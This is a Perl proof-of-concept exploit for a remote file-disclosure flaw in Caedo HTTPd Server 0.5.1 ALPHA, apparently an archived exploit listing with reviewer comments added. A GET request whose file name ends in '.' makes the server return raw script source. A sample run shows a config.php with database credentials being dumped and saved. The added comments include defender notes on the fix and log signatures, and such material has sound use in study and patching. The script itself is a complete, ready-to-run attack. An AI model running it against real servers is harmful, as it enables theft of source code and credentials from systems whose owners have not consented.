# Title : Caedo HTTPd Server v 0.5.1 ALPHA Remote File Download
# Published : 2011-01-29
# Author : Zer0 Thunder
#!/usr/bin/perl
use LWP::Simple;
#Caedo HTTPd Server v 0.5.1 ALPHA Remote File Download Exploit
#Author : Zer0 Thunder
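use strict;
use warnings;

# Proof-of-concept for the Caedo HTTPd Server 0.5.1 ALPHA file-disclosure
# issue.  It issues one HTTP GET for <path>/<file> with a trailing "."
# appended to the file name, prints the response body and saves a copy in
# the current directory.  The sample run at the end of this file shows the
# server answering with the raw source of config.php (database credentials
# included) instead of executing it.
#
# NOTE(review): the page does not state the root cause.  Presumably the
# trailing dot defeats the server's extension-based handler mapping while
# the file system still resolves the name -- confirm against the advisory.
#
# Defender notes: the fix belongs in the server (reject or normalise request
# paths ending in "." before mapping them to files); in access logs the
# request shows up as a GET whose URI ends in "." for a script file.
#
# Changes against the published listing:
#   * the usage text documents four arguments, so fewer than four is an error
#     (the original tested "< 3" and ran with an undefined file name);
#   * escape sequences lost in extraction ("rn", "n") are restored to
#     "\r\n" / "\n";
#   * a failed request is reported instead of printing/writing undef;
#   * the local copy is written with three-argument open and a lexical
#     handle, under the base name only, so a crafted file argument cannot
#     inject an open mode or write outside the current directory.
if (@ARGV < 4) {
    print("\r\n");
    print("Caedo HTTPd Server Remote File Download Exploit\r\n");
    print("Vuln Found and Exploited by Zer0 Thunder\r\n");
    print("***************************************************");
    print("Usage: " . $0 . " [ host] [ port ] [path] [ file ]\r\n");
    print("Example: " . $0 . " hostingserver.com 80 / config.php\r\n\r\n");
    exit(1);
}
else {
    print("Caedo HTTPd Server Remote File Download Exploit\r\n");
    print("Vuln Found and Exploited by Zer0 Thunder\r\n");
    print("***************************************************");

    my ($target, $port, $path, $file) = @ARGV;

    # Request URL is built exactly as in the original listing; the trailing
    # "." is the whole trigger.
    my $url    = "http://" . $target . ":" . $port . "/" . $path . "/" . $file . ".";
    my $result = get($url);

    # LWP::Simple::get returns undef on any failure (connection refused,
    # non-2xx status, ...).
    if (!defined $result) {
        print("\nRequest failed or returned no content\r\n");
        exit(1);
    }

    # The body is untrusted server output and is echoed unfiltered.
    print("\nFile Content:\r\n\r\n");
    print($result . "\r\n");

    # Keep only the final path component for the local copy.
    (my $local_name = $file) =~ s{.*[/\\]}{};
    if ($local_name eq '' || $local_name eq '.' || $local_name eq '..') {
        die "Refusing to derive a local file name from '$file'\n";
    }

    open(my $out_fh, '>', $local_name)
        or die "Cannot open '$local_name' for writing: $!\n";
    print {$out_fh} $result;
    close($out_fh)
        or die "Cannot close '$local_name': $!\n";

    print " File Saved : $local_name \n\n";
    print "---------------------------------------------\n";
    print "site : zt-security.com - colombohackers.com\n";
}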
#zero@zero-desktop:~/Desktop/exploit$ perl caedo.pl 192.168.1.101 8080 test config.php
#Caedo HTTPd Server Remote File Download Exploit
#Vuln Found and Exploited by Zer0 Thunder
#***************************************************
#File Content:
#
#<?PHP
#Config File
#$db_host = "localhost";
#$db_name = "test";
#$db_user = "test"
#$db_pass = "y0usuck";
#?>
#
# File Saved : config.php
#
#---------------------------------------------
#site : zt-security.com - colombohackers.com
#zero@zero-desktop:~/Desktop/exploit$